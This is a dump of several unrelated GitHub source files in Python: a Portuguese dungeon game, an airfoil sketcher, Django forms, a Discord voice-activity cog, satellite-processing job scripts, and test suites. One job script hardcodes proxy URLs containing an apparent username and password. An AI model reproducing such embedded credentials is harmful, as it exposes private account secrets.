Iniciou')\n self.execute_menu()\n\n def start_new_game(self):\n print('Novo Jogo!')\n\n player_info = self.create_character()\n self.display_player_info(player_info)\n\n def create_character(self):\n name = input('Digite o nome do seu personagem: ')\n id_race = self.choose_race()\n id_class = self.choose_class()\n id_map = '5'\n player_id = self.db_connection.create_player(\n name,\n id_race,\n id_class,\n id_map\n )\n\n inventory = self.get_initial_gear(player_id)\n player_info = self.db_connection.get_player_basic_info(player_id)\n\n self.player = Player(\n player_id=(player_id,),\n inventory=inventory,\n player_basic_info=player_info\n )\n\n\n print('AVENTUREIRO CRIADO COM SUCESSO!')\n print(f\"ID DO AVENTUREIRO {player_id}\")\n return player_info\n\n def get_initial_gear(self, player_id):\n # TODO change this accordingly with the player class\n # return {\n # 'weapons': [\n # self.db_connection.add_item_to_inventory(\n # player_id,\n # self.db_connection.get_weapon,\n # 'Espada'\n # ),\n # self.db_connection.add_item_to_inventory(\n # player_id,\n # self.db_connection.get_weapon,\n # 'Escudo'\n # )\n # ],\n # 'potions': [],\n # 'armour': [],\n # 'boost': [],\n # }\n return {}\n\n @staticmethod\n def display_player_info(player_list):\n player_info = player_list[0]\n name = player_info[0]\n race_data = player_info[1].replace('(', '').replace(')', '').split(',')\n race_name = race_data[1]\n class_data = player_info[2].replace('(', '').replace(')', '').split(\n ',')\n 
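# As with race_data above, field 1 of the "(...)" tuple string is the display name; fields 2-7 hold the six stats summed below.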
class_name = class_data[1]\n location = player_info[3]\n print('!! AVENTUREIRO -----------------------------------------------')\n print(f'Nome: {name}')\n print(f'Raça: {race_name}')\n print(f'Classe: {class_name}')\n print(f'Local Atual: {location}')\n stats = {\n 0: 'DESTREZA',\n 1: 'CARISMA',\n 2: 'INTELIGENCIA',\n 3: 'FORÇA',\n 4: 'SABEDORIA',\n 5: 'CONSTITUIÇÃO'\n }\n for index, value in enumerate(zip(race_data[2:8], class_data[2:8])):\n print(\n f'{stats.get(index)}: '\n f'{str(sum([int(item) for item in value]))}'\n )\n print('--------------------------------------------------------------')\n\n def choose_class(self):\n classes = self.db_connection.get_classes()\n print('\\nClasses:')\n for char_class in classes:\n print(f'{char_class[1]} => '\n f'DESTREZA: {char_class[2]}, '\n f'CARISMA {char_class[3]}, '\n f'INTELIGÊNCIA {char_class[4]}, '\n f'FORÇA {char_class[5]}, '\n f'SABEDORIA {char_class[6]}, '\n f'CONSTITUIÇÃO: {char_class[7]}'\n f'\\n---------------------------')\n print('Digite o nome da Classe! Exemplo: Assassino')\n return input('Escolha a classe do seu personagem: ')\n\n def choose_race(self):\n races = self.db_connection.get_races()\n print('\\nRAÇAS:')\n for race in races:\n print(f'{race[1]} => '\n f'DESTREZA: {race[2]}, '\n f'CARISMA {race[3]}, '\n f'INTELIGÊNCIA {race[4]}, '\n f'FORÇA {race[5]}, '\n f'SABEDORIA {race[6]}, '\n f'CONSTITUIÇÃO: {race[7]}'\n f'\\n---------------------------')\n print('Digite o nome da raça! Exemplo: Orc')\n return input('Escolha a raça do seu personagem: ')\n\n def load_game(self):\n print('Carregar Jogo!')\n\n player_id = input('Digite o id do seu personagem: ')\n inventory = self.db_connection.get_inventory(player_id)\n\n player_info = self.db_connection.get_player_basic_info(player_id)\n\n self.player = Player(\n player_id=player_id,\n inventory=inventory,\n player_basic_info=player_info\n )\n\n self.display_player_info(player_info)\n\n def exit(self):\n pass\n\n def execute_menu(self):\n menu = {\n '1': {\n 'str': 'Iniciar novo jogo',\n 'func': self.start_new_game\n },\n '2': {\n 'str': 'Carregar jogo',\n 'func': self.load_game},\n '0': {\n 'str': 'Sair',\n 'func': self.exit\n }\n }\n for item in menu:\n print(f'{item}) {menu.get(item).get(\"str\")}')\n player_choice = input('Escolha uma opção: ')\n\n if player_choice:\n menu.get(str(player_choice)).get('func')()\n if self.player:\n self.run_gameplay()\n else:\n exit()\n\n def run_gameplay(self):\n while True:\n if self.player.dead:\n break\n self.display_basic_info()\n self.display_player_location()\n\n command = input('>>> ')\n try:\n status = self.parse_command(command)\n except Exception as error:\n print(f'Erro {error}')\n pass\n\n if self.player.dead:\n print(\"Game Over!\")\n\n def display_basic_info(self):\n print('-----------------AVENTUREIRO-----------------')\n print(f\"\\tID: {self.player.player_id}\")\n print(f\"\\tNome: {self.player.name}\")\n print(f\"\\tVida: {self.player.life}\")\n print('---------------------------------------------\\n')\n\n def display_player_location(self):\n result = self.db_connection.get_player_location(self.player.player_id)\n print(f'Local: {result.get(\"name\")}')\n print(f'{result.get(\"description\")}')\n self.display_enemies()\n if not self.player.in_combat:\n self.display_exits(result)\n\n def display_enemies(self):\n if not self.enemies:\n self.player.in_combat = False\n return\n\n self.player.in_combat = True\n print('\\nHá inimigos aqui! 
Você está em combate!')\n for enemy in self.enemies:\n print(f'Id ({enemy.get(\"id\")}) '\n f'INIMIGO: {enemy.get(\"name\")}, '\n f'Vida: {enemy.get(\"life\")}\\n')\n\n @staticmethod\n def display_exits(result):\n north_string = (\n f'{result.get(\"north\").get(\"name\")}, '\n f'id: {result.get(\"north\").get(\"id\")}'\n ) if result.get(\"north\").get(\"id\") else \"Nada!\"\n south_string = (\n f'{result.get(\"south\").get(\"name\")}, '\n f'id: {result.get(\"south\").get(\"id\")}'\n ) if result.get(\"south\").get(\"id\") else \"Nada!\"\n east_string = (\n f'{result.get(\"east\").get(\"name\")}, '\n f'id: {result.get(\"east\").get(\"id\")}'\n ) if result.get(\"east\").get(\"id\") else \"Nada!\"\n west_string = (\n f'{result.get(\"west\").get(\"name\")}, '\n f'id: {result.get(\"west\").get(\"id\")}'\n ) if result.get(\"west\").get(\"id\") else \"Nada!\"\n print(\n f'Saídas:'\n f'\\n\\tAo norte: {north_string}'\n f'\\n\\tAo sul: {south_string}'\n f'\\n\\tAo ao leste: {east_string}'\n f'\\n\\tAo oeste: {west_string}'\n )\n\n print(\n '''\\n\\tPara se mover digite o comando \"ir {id do lugar}, por exemplo.\"\n Para mais informações, utilize o comando \"ajuda ir\",\n Ou apenas \"ajuda\" para obter informações gerais sobre os comandos. \n '''\n )\n\n\nif __name__ == '__main__':\n game = Game()\n game.start()\n","repo_name":"SBD1/Grupo5-Dungeons-and-Dragons","sub_path":"app/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"35706939630","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 27 09:34:46 2022\r\n\r\nGoal:\r\n Sketch the airfoil\r\n\r\n@author: mcaoue2\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\n\r\n\r\n\r\n\r\nclass SketchAirFoil():\r\n def __init__(self):\r\n return\r\n \r\n \r\n def get_contour(self, angle=0, N_pts=100):\r\n \r\n # From https://www.researchgate.net/publication/312222678_Simple_analytic_equation_for_airfoil_shape_description\r\n B = 2\r\n T = 0.15\r\n C = 0.08\r\n P = 1\r\n E = 1\r\n R = 0\r\n \r\n # Parametric parameter\r\n t = np.linspace(0.001, 2*np.pi-0.001, N_pts)\r\n \r\n x = 0.5 + 0.5*np.abs(np.cos(t))**B/np.cos(t)\r\n \r\n y = (0.5*T*np.abs(np.sin(t))**B/np.sin(t)*(1-x**P) + \r\n C*np.sin(x**E*np.pi) + \r\n R*np.sin(x*2*np.pi) ) \r\n \r\n # Rotate\r\n rot_M = np.matrix([[np.cos(-angle), -np.sin(-angle)], \r\n [np.sin(-angle), np.cos(-angle)] ])\r\n \r\n cx, cy = np.dot(rot_M, [x, y])\r\n \r\n return np.array(cx)[0], np.array(cy)[0]\r\n \r\n \r\nif __name__ == '__main__': \r\n # Verify some property of the airfoil\r\n \r\n # =============================================================================\r\n # Visualize the skecth\r\n # =============================================================================\r\n \r\n import matplotlib.pyplot as plt \r\n\r\n\r\n self = SketchAirFoil()\r\n \r\n cont_x, cont_y = self.get_contour(angle=0.1)\r\n \r\n plt.figure()\r\n plt.plot(-cont_x, cont_y, color='r')\r\n plt.axis('equal')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"MichaelCaouette/Paramotor_modeling","sub_path":"Paramotor Model/sketch_airfoil.py","file_name":"sketch_airfoil.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40687628046","text":"from authentication.models import User\nfrom users.models import UserProfile, Business, SubBusiness\nfrom django.forms import ModelForm, 
PasswordInput, Textarea, CheckboxSelectMultiple\nfrom django import forms\n\n\nclass Credential(ModelForm):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['first_name']\n\n\nclass Customer(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['photo', 'desc']\n\t\twidgets = {\n\t\t\t'desc': Textarea()\n\t\t}\n\t\t\nclass Business(ModelForm):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(Business, self).__init__(*args, **kwargs)\n\t\tself.fields['address_area'].empty_label = 'Please select'\n\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['business_name', 'website', 'mobile_number', 'desc', 'get_sms',\n\t\t 'address_1', 'address_2', 'address_3', 'address_area',\n\t\t 'can_travel', 'travel_distance', 'customer_travel', 'only_remote',\n\t\t 'employees','facebook', 'linkedin', 'twitter', 'pinterest', 'instagram','logo', 'photo'\n\t\t]\n\t\twidgets = {\n\t\t\t'travel_distance': CheckboxSelectMultiple,\n\t\t\t'desc': Textarea\n\t\t}\n\nclass BusinessHead(ModelForm):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(BusinessHead, self).__init__(*args, **kwargs)\n\t\tself.fields['address_area'].empty_label = 'Please select'\n\t\t\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = [\n\t\t\t'business_name', \n\t\t\t'website', \n\t\t\t'mobile_number', \n\t\t\t'photo', \n\t\t\t'address_1', \n\t\t\t'address_2', \n\t\t\t'address_3', \n\t\t\t'address_area',\n\t\t\t'employees',\n\t\t\t'business_since',\n\t\t\t'logo'\n\t\t]\n\nclass BusinessCompanyDesc(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['desc']\n\t\twidgets = {\n\t\t\t'desc': Textarea\n\t\t}\n\nclass BusinessSerivceDesc(ModelForm):\n\tdef __init__(self, *args,**kwargs):\n\t\tsuper (BusinessSerivceDesc, self).__init__(*args,**kwargs) # populates the post\n\t\tself.fields['sub_business'].queryset = SubBusiness.objects.filter(business=self.instance.business.first)\n\n\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['sub_business','service_desc']\n\t\twidgets = {\n\t\t\t'sub_business': CheckboxSelectMultiple,\n\t\t\t'service_desc': Textarea\n\t\t}\n\nclass BusinessPreference(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['travel_to_customer','customer_travel','travel_distance']\n\t\twidgets = {\n\t\t\t'travel_distance': CheckboxSelectMultiple\n\t\t}\n\nclass BusinessCompanyDetail(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['address_1', 'address_2', 'address_3', 'address_4','employees','business_since']\n\nclass BusinessCompanySocial(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['facebook', 'linkedin', 'twitter', 'google', 'pinterest', 'instagram']\n\nclass BusinessWorkImage(ModelForm):\n\tclass Meta:\n\t\tmodel = UserProfile\n\t\tfields = ['work_image_1', 'work_image_2', 'work_image_3']\n\t\t\nclass ShowCase(forms.Form):\n\n\ttitle = forms.CharField(required=True, max_length=1024, widget=forms.TextInput(attrs={\n\t\t\"class\":\"form-control\", \n\t\t\"required\":\"\", \n\t\t\"data-parsley-ui-enabled\":\"false\"}))\n\n\tattIds = []\n\tnew_count = 0\n\tnew_field_prefix = \"new_\"\n\n\tdef __init__(self, *args, **kwargs):\n\t\tattIds = kwargs.pop('attIds')\n\t\tnew_count = kwargs.pop('new_count', 0)\n\t\tself.form_name = kwargs.pop('form_name')\n\n\t\tsuper(ShowCase, self).__init__(*args, **kwargs)\n\n\t\tself.attIds = attIds\n\t\tself.new_count = new_count\n\n\t\tfor attId in attIds:\n\t\t\tself._add_field('',str(attId))\n\n\t\tfor i in range(new_count):\n\t\t\tself._add_field(self.new_field_prefix, str(i))\n\n\tdef 
_add_field(self, prefix, id):\n\t\tself.fields[self.form_name + '_' + prefix + 'caption_' + id] = forms.CharField(\n\t\t\tmax_length=1024,\n\t\t\twidget=forms.TextInput(attrs={\n\t\t\t\t\"class\":\"form-control\", \n\t\t\t\t\"placeholder\":\"Add Caption\", \n\t\t\t\t\"required\":\"\", \n\t\t\t\t\"data-parsley-ui-enabled\":\"false\"\n\t\t\t}),\n\t\t\trequired=False\n\t\t)\n\t\tself.fields[self.form_name + '_' + prefix + 'file_' + id] = forms.FileField(required=False)\n\n\tdef get_file_rows(self):\n\t\trows = []\n\t\tfor attId in self.attIds: \n\t\t\trows.append({\n\t\t\t\t'caption' : self[self.form_name + '_caption_' + str(attId)], \n\t\t\t\t'file': self[self.form_name + '_file_' + str(attId)],\n\t\t\t\t'attId': attId\n\t\t\t})\n\n\t\tfor i in range(self.new_count): \n\t\t\trows.append({\n\t\t\t\t'caption' : self[self.form_name + '_' + self.new_field_prefix + 'caption_' + str(i)], \n\t\t\t\t'file': self[self.form_name + '_' + self.new_field_prefix + 'file_' + str(i)],\n\t\t\t})\n\n\t\treturn rows","repo_name":"thenrikie/weconnect","sub_path":"users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"4785196035","text":"from typing import Union\nimport time\n\nimport disnake\nfrom disnake.ext import commands\n\nfrom src.logger import get_voice_logger\nfrom src.ext.activity.services import add_voice_time\n\n\nlogger = get_voice_logger()\nMIN_MEMRBER_AMOUNT = 2\n\n\nclass VoiceActivityCog(commands.Cog):\n def __init__(self, bot) -> None:\n self.bot = bot\n self.count_for = {}\n self.allowed_channels = set()\n\n def external_sync(\n self,\n user: Union[disnake.Member, disnake.User],\n ) -> None:\n if not isinstance(user, disnake.Member):\n return\n\n voice_state = user.voice\n if not voice_state:\n return\n\n channel = voice_state.channel\n if not channel:\n return\n\n self._check_channel(channel)\n self._sync_member(user)\n\n @commands.Cog.listener()\n async def on_voice_state_update(\n self,\n member: disnake.Member,\n before: disnake.VoiceState,\n after: disnake.VoiceState\n ) -> None:\n if member.bot:\n return\n\n if before.channel != after.channel:\n if before.channel:\n self._check_channel(before.channel)\n if after.channel:\n self._check_channel(after.channel)\n\n self._sync_member(member)\n\n def _sync_member(self, member: disnake.Member) -> None:\n self._try_remove_from_count(member)\n self._try_add_to_count(member)\n\n def _try_remove_from_count(self, member: disnake.Member) -> None:\n if not self._is_count_for(member):\n return\n\n seconds = time.time() - self.count_for.pop(\n (member.guild.id, member.id)\n )\n logger.info('stop voice activity for %s on guild %s (%ds.)',\n member, member.guild, seconds)\n add_voice_time(\n member.guild.id,\n member.id,\n int(seconds),\n )\n\n def _try_add_to_count(self, member: disnake.Member) -> None:\n voice_state = member.voice\n if not voice_state:\n return\n if not self._is_can_add_to_count(member):\n return\n\n self.count_for[(member.guild.id, member.id)] = time.time()\n logger.info('start count voice activity for %s on guild %s',\n member, member.guild)\n\n def _check_channel(\n self,\n channel: Union[disnake.VoiceChannel,\n disnake.StageChannel]\n ) -> None:\n members = channel.members\n members = list(filter(_is_conversation_participant, members))\n\n if len(members) >= MIN_MEMRBER_AMOUNT:\n if not self._is_channel_allowed(channel):\n self.allowed_channels.add(channel.id)\n logger.info('add %s to 
allowed_channels', channel)\n for member in members:\n self._try_add_to_count(member)\n else:\n if self._is_channel_allowed(channel):\n self.allowed_channels.remove(channel.id)\n logger.info('remove %s from allowed_channels', channel)\n for member in members:\n self._try_remove_from_count(member)\n\n def _is_can_add_to_count(self, member: disnake.Member) -> bool:\n voice_state = member.voice\n if not voice_state:\n return False\n\n channel = voice_state.channel\n if not channel:\n return False\n\n return (_is_conversation_participant(member) and\n not self._is_count_for(member) and\n self._is_channel_allowed(channel))\n\n def _is_count_for(self, member: disnake.Member) -> bool:\n return (member.guild.id, member.id) in self.count_for\n\n def _is_channel_allowed(\n self,\n channel: Union[disnake.VoiceChannel,\n disnake.StageChannel]\n ) -> bool:\n return channel.id in self.allowed_channels\n\n\ndef _is_conversation_participant(member: disnake.Member) -> bool:\n return not member.bot and not _is_muted(member)\n\n\ndef _is_muted(member: disnake.Member) -> bool:\n voice_state = member.voice\n if not voice_state:\n return False\n return voice_state.deaf or voice_state.self_deaf\n\n\ndef setup(bot) -> None:\n bot.add_cog(VoiceActivityCog(bot))\n","repo_name":"Ferlern/CindocuBot","sub_path":"src/ext/activity/voice_activity.py","file_name":"voice_activity.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"3229421124","text":"from pbprocesstools.pbpt_q_process import PBPTGenQProcessToolCmds\nimport rsgislib\nimport logging\nimport os\nimport sys\n\nsys.path.insert(0, \"../../01_sen2_ard/03_find_dwnld_scns\")\nfrom sen2scnprocess import RecordSen2Process\n\nlogger = logging.getLogger(__name__)\n\nclass GenExtractSamplesCmds(PBPTGenQProcessToolCmds):\n\n def gen_command_info(self, **kwargs):\n if not os.path.exists(kwargs['scn_db_file']):\n raise Exception(\"Sentinel-2 scene database does not exist...\")\n\n sen2_rcd_obj = RecordSen2Process(kwargs['scn_db_file'])\n scns = sen2_rcd_obj.get_processed_scns()\n err_scns = []\n for scn in scns:\n #print(scn.product_id)\n scn_out_mng_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_mng_smpls.h5\".format(scn.product_id))\n scn_out_oth_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_oth_smpls.h5\".format(scn.product_id))\n scn_out_wat_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_wat_smpls.h5\".format(scn.product_id))\n scn_out_cpl_file = os.path.join(kwargs['granule_out_h5_samples_path'], \"{}_cmplt.txt\".format(scn.product_id))\n if (not os.path.exists(scn_out_cpl_file)):\n vld_img = self.find_first_file(scn.ard_path, \"*valid.kea\", rtn_except=False)\n clrsky_img = self.find_first_file(scn.ard_path, \"*clearsky_refine.kea\", rtn_except=False)\n sref_img = self.find_first_file(scn.ard_path, \"*vmsk_rad_srefdem_stdsref.kea\", rtn_except=False)\n if (vld_img is None) or (clrsky_img is None) or (sref_img is None):\n clouds_img = self.find_first_file(scn.ard_path, \"*clouds.kea\", rtn_except=False)\n if clouds_img is None:\n print(\"***ERROR***: {}\".format(scn.ard_path))\n err_scns.append(scn.ard_path)\n else:\n c_dict = dict()\n c_dict['scn_id'] = scn.product_id\n c_dict['vld_img'] = vld_img\n c_dict['clrsky_img'] = clrsky_img\n c_dict['sref_img'] = sref_img\n c_dict['samples_vec_file'] = kwargs['samples_vec_file']\n c_dict['samples_vec_lyr'] = kwargs['samples_vec_lyr']\n c_dict['samples_vec_edits'] = 
kwargs['samples_vec_edits']\n c_dict['mangrove_samp_lyrs'] = kwargs['mangrove_samp_lyrs']\n c_dict['other_samp_lyrs'] = kwargs['other_samp_lyrs']\n c_dict['not_mng_regions'] = kwargs['not_mng_regions']\n c_dict['not_oth_regions'] = kwargs['not_oth_regions']\n c_dict['water_smpls_vec_file'] = kwargs['water_smpls_vec_file']\n c_dict['water_smpls_vec_lyr'] = kwargs['water_smpls_vec_lyr']\n c_dict['scn_out_mng_file'] = scn_out_mng_file\n c_dict['scn_out_oth_file'] = scn_out_oth_file\n c_dict['scn_out_wat_file'] = scn_out_wat_file\n c_dict['scn_out_cpl_file'] = scn_out_cpl_file\n c_dict['tmp_dir'] = os.path.join(kwargs['tmp_dir'], \"{}_extract_smpls\".format(scn.product_id))\n if not os.path.exists(c_dict['tmp_dir']):\n os.mkdir(c_dict['tmp_dir'])\n self.params.append(c_dict)\n print(\"ERRORS:\")\n for err_scn in err_scns:\n print(err_scn)\n\n def run_gen_commands(self):\n self.gen_command_info(scn_db_file='/scratch/a.pfb/gmw_v2_gapfill/scripts/01_sen2_ard/03_find_dwnld_scns/sen2_scn.db',\n samples_vec_file='/scratch/a.pfb/gmw_v2_gapfill/data/granule_mang_train_smpls_uid.gpkg',\n samples_vec_lyr='samples',\n samples_vec_edits='/scratch/a.pfb/gmw_v2_gapfill/scripts/03_sen2_mangrove_cls/01_define_training/gmw_gap_fill_train_edits.gpkg',\n mangrove_samp_lyrs='mangrove_pts',\n other_samp_lyrs='other_pts',\n not_mng_regions='not_mangroves_regions',\n not_oth_regions='not_other_regions',\n water_smpls_vec_file='/scratch/a.pfb/gmw_v2_gapfill/scripts/03_sen2_mangrove_cls/01_define_training/gmw_water_train_smps.gpkg',\n water_smpls_vec_lyr='water_smps',\n granule_out_h5_samples_path='/scratch/a.pfb/gmw_v2_gapfill/data/scn_h5_samples',\n tmp_dir='/scratch/a.pfb/gmw_v2_gapfill/tmp')\n self.pop_params_db()\n self.create_slurm_sub_sh(\"extract_sen2_samples\", 16448, '/scratch/a.pfb/gmw_v2_gapfill/logs',\n run_script='run_exe_analysis.sh', job_dir=\"job_scripts\",\n db_info_file=None, account_name='scw1376', n_cores_per_job=10, n_jobs=10,\n job_time_limit='2-23:59',\n module_load='module load parallel singularity\\n\\nexport http_proxy=\"http://a.pfb:proxy101019@10.212.63.246:3128\"\\nexport https_proxy=\"http://a.pfb:proxy101019@10.212.63.246:3128\"\\n')\n\n\nif __name__ == \"__main__\":\n py_script = os.path.abspath(\"extract_scn_train_data.py\")\n script_cmd = \"singularity exec --bind /scratch/a.pfb:/scratch/a.pfb --bind /home/a.pfb:/home/a.pfb /scratch/a.pfb/sw_imgs/au-eoed-dev.sif python {}\".format(py_script)\n\n process_tools_mod = 'extract_scn_train_data'\n process_tools_cls = 'ExtractSceneTrainSamples'\n\n create_tools = GenExtractSamplesCmds(cmd=script_cmd, db_conn_file=\"/home/a.pfb/gmw_gap_fill_db/pbpt_db_conn.txt\",\n lock_file_path=\"./gmw_gapfill_lock_file.txt\",\n process_tools_mod=process_tools_mod, process_tools_cls=process_tools_cls)\n create_tools.parse_cmds()\n","repo_name":"globalmangrovewatch/gmw_gap_fill_2020","sub_path":"03_sen2_mangrove_cls/02_extract_scene_training/gen_extract_scn_train_data_cmds.py","file_name":"gen_extract_scn_train_data_cmds.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7000203942","text":"import os\nimport warnings\n\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nimport pytest\n\nfrom stdatamodels.jwst.datamodels import FilteroffsetModel, ImageModel\n\n\nFITS_FILE = os.path.join(os.path.dirname(__file__), 'data', 'sip.fits')\n\n\ndef test_get_fits_wcs(tmpdir):\n with ImageModel(FITS_FILE) as dm:\n\n # Refer to the data array 
to initialize it.\n dm.data = np.zeros((5, 5))\n\n # Now continue with the test.\n wcs1 = dm.get_fits_wcs()\n dm2 = dm.copy()\n wcs2 = dm2.get_fits_wcs()\n\n x = np.random.rand(2 ** 16, wcs1.wcs.naxis)\n world1 = wcs1.all_pix2world(x, 1)\n world2 = wcs2.all_pix2world(x, 1)\n\n assert_array_almost_equal(world1, world2)\n\n wcs1.wcs.crpix[0] = 42.0\n\n dm2.set_fits_wcs(wcs1)\n assert dm2.meta.wcsinfo.crpix1 == 42.0\n\n with warnings.catch_warnings():\n # Filter out warnings generated by WCSLIB>=7.1\n warnings.simplefilter(\"ignore\")\n wcs2 = dm2.get_fits_wcs()\n assert wcs2.wcs.crpix[0] == 42.0\n\n dm2_tmp_fits = str(tmpdir.join(\"tmp_dm2.fits\"))\n dm2.to_fits(dm2_tmp_fits)\n\n with ImageModel(dm2_tmp_fits) as dm3:\n wcs3 = dm3.get_fits_wcs()\n\n assert wcs3.wcs.crpix[0] == 42.0\n\n x = np.random.rand(2 ** 16, wcs1.wcs.naxis)\n world1 = wcs1.all_pix2world(x, 1)\n world2 = wcs3.all_pix2world(x, 1)\n\n dm4 = ImageModel((10, 10))\n dm4.set_fits_wcs(wcs3)\n dm4_tmp_fits = str(tmpdir.join(\"tmp_dm4.fits\"))\n dm4.to_fits(dm4_tmp_fits, overwrite=True)\n\n with ImageModel(dm4_tmp_fits) as dm5:\n with warnings.catch_warnings():\n # Filter out warnings generated by WCSLIB>=7.1\n warnings.simplefilter(\"ignore\")\n wcs5 = dm5.get_fits_wcs()\n\n assert wcs5.wcs.crpix[0] == 42.0\n\n\ndef test_wcs_ref_models():\n filters = [{'name': 'F090W', 'row_offset': 1, 'column_offset': 1},\n {'name': 'F070W', 'row_offset': 2, 'column_offset': 2}\n ]\n with FilteroffsetModel(filters=filters, instrument='NIRCAM', strict_validation=True) as fo:\n fo.filters == filters\n with pytest.raises(ValueError, match=\"Model.meta is missing values for\"\n \"['description', 'reftype', 'author', 'pedigree',\"\n \"'useafter']\"):\n fo.validate()\n\n filters = [{'filter': 'F090W', 'pupil': 'GRISMR',\n 'row_offset': 1, 'column_offset': 1},\n {'filter': 'F070W', 'pupil': 'GRISMC',\n 'row_offset': 2, 'column_offset': 2}\n ]\n with FilteroffsetModel(filters=filters, instrument='NIRCAM', strict_validation=True) as fo:\n fo.filters == filters\n fo.meta.description = \"Filter offsets\"\n fo.meta.reftype = \"filteroffset\"\n fo.meta.author = \"Unknown\"\n fo.meta.pedigree = \"GROUND\"\n fo.meta.useafter = \"2019-12-01\"\n\n with pytest.raises(ValueError, match=\"Expected meta.instrument.channel for \"\n \"instrument NIRCAM to be one of \"):\n fo.validate()\n fo.meta.instrument.channel = 'SHORT'\n fo.meta.instrument.module = \"A\"\n fo.validate()\n","repo_name":"spacetelescope/stdatamodels","sub_path":"src/stdatamodels/jwst/datamodels/tests/test_wcs.py","file_name":"test_wcs.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"9067423213","text":"from flask import Flask, request, jsonify\nfrom minio import Minio\n\nclient = Minio('127.0.0.1:9000', access_key='accessKey', secret_key='secretKey', secure=False)\napp = Flask(__name__)\n\n@app.route('/', methods=['POST', 'GET'])\ndef main():\n payload = request.get_json()\n a = client.get_object('json-files', payload['Records'][0]['s3']['object']['key'])\n print(a.read())\n return jsonify(payload)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8082, debug=True)\n","repo_name":"ashok-an/minio-workflow","sub_path":"notification-webhook/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43267112083","text":"import sys\nsys.path.append(\"..\") # 
noqa\nimport TranscriptClean as TC\nimport pytest\nimport os\nimport subprocess\nimport pybedtools\nimport warnings\n\n\n@pytest.mark.unit\nclass TestProcessSpliceAnnot(object):\n def test_tmp_files(self):\n \"\"\" Check that the expected tmp files are created.\"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n\n # Check if paths of tmp files are correct\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_donors_tmp.bed\")\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_acceptors_tmp.bed\")\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_donors_tmp.sorted.bed\")\n assert os.path.exists(\n \"scratch/sj_reading_test/splice_files/test_ref_splice_acceptors_tmp.sorted.bed\")\n\n def test_chrom_filtering(self):\n \"\"\" Check that only chr1 and chr2 junctions get saved\"\"\"\n\n sj_file = \"input_files/toy_sjs_mixed_chroms.txt\"\n chroms = set([\"chr1\", \"chr2\"])\n tmp_dir = \"scratch/sj_reading_test/\"\n os.system(\"mkdir -p \" + tmp_dir)\n\n donor_bt, accept_bt, annot = TC.processSpliceAnnotation(sj_file, tmp_dir,\n chroms, process=\"test\")\n # Check donor chroms\n # donor_chroms = set()\n # for pos in donor_bt:\n # donor_chroms.add(pos.chrom)\n assert set(donor_bt.Chromosome) == chroms\n\n # Check acceptor chroms\n # acc_chroms = set()\n # for pos in accept_bt:\n # acc_chroms.add(pos.chrom)\n assert set(accept_bt.Chromosome) == chroms\n\n def test_chrom_warning(self):\n \"\"\" Make sure the function prints a warning if no splice donors or \n acceptors are found on the provided chromosome. 
